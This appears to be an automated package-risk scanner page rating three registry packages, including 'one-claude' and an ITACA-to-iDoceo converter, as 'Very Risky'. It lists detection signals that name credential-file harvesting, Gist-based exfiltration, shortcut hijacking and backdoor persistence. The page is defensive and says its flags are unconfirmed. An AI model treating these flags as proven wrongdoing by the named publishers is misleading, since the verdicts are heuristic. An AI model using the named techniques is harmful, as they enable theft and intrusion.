Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 12/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 7610 lines, 346.6 kB across 42 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'one-claude' matches AI hallucination template [python] + [claude] + [one].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 240 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/cli.py:221
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/cli.py:356
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in one_claude-0.1.5/one_claude/gist/api.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/gist/api.py:10
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/cli.py:221
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/cli.py:356
  • EXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in one_claude-0.1.5/one_claude/gist/api.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/gist/api.py:10
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/gist/exporter.py:36
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/teleport/sandbox.py:30
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/tui/screens/gist_modals.py:123
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/tui/screens/home.py:603

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
160 380d 28 886 ↑0.1/day
Very Risky
claude npm 2.1.0 zuotongxue zuogl448@gmail.com gmail.com 🪝 🗄️
Package purpose: A CLI tool to switch between different Claude API configurations with instant shell activation
Claimed homepage: https://github.com/zuogl/claudeCodeConfigChanger#readme
Matched naming pattern: claude-claude-changer
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 380
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 28/month, 7/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 886 lines, 35.8 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'zuogl448@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 352 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/ccc-setup.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/ccc-setup.js:50 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/ccc-setup.js:32 (+4 more occurrence(s) elsewhere)
  • HIGHCREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in package/bin/ccc.js:103
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/ccc-setup.js:6 (+3 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/ccc-setup.js:50 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/ccc-setup.js:32 (+4 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in package/bin/ccc.js:103

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
155 24d 434 5,718 ↑18.1/day
Very Risky
itaca pypi 0.8.0 Leopoldo Pla Sempere — 🪝
Package purpose: Convierte localmente listados PDF de alumnado de ITACA a XLSX preparados para importar en iDoceo
Claimed homepage: https://pypi.org/project/itaca-idoceo/
Matched naming pattern: python-itaca-idoceo
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 24
Registry downloads: 434/month, 16/week (MODERATE_USAGE)
Codebase size: 5718 lines, 237.5 kB across 18 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (20 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in itaca_idoceo-0.8.0/src/itaca_idoceo/gui.py:724
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py:95
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py:131
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py
  • INFOSubstantial functional codebase (5718 LOC across 18 file(s)).
  • INFOModerate community usage with 434 monthly downloads.
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in itaca_idoceo-0.8.0/src/itaca_idoceo/gui.py:724
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py:95
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py:131
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in itaca_idoceo-0.8.0/src/itaca_idoceo/integrations.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →

LINK COPIED TO CLIPBOARD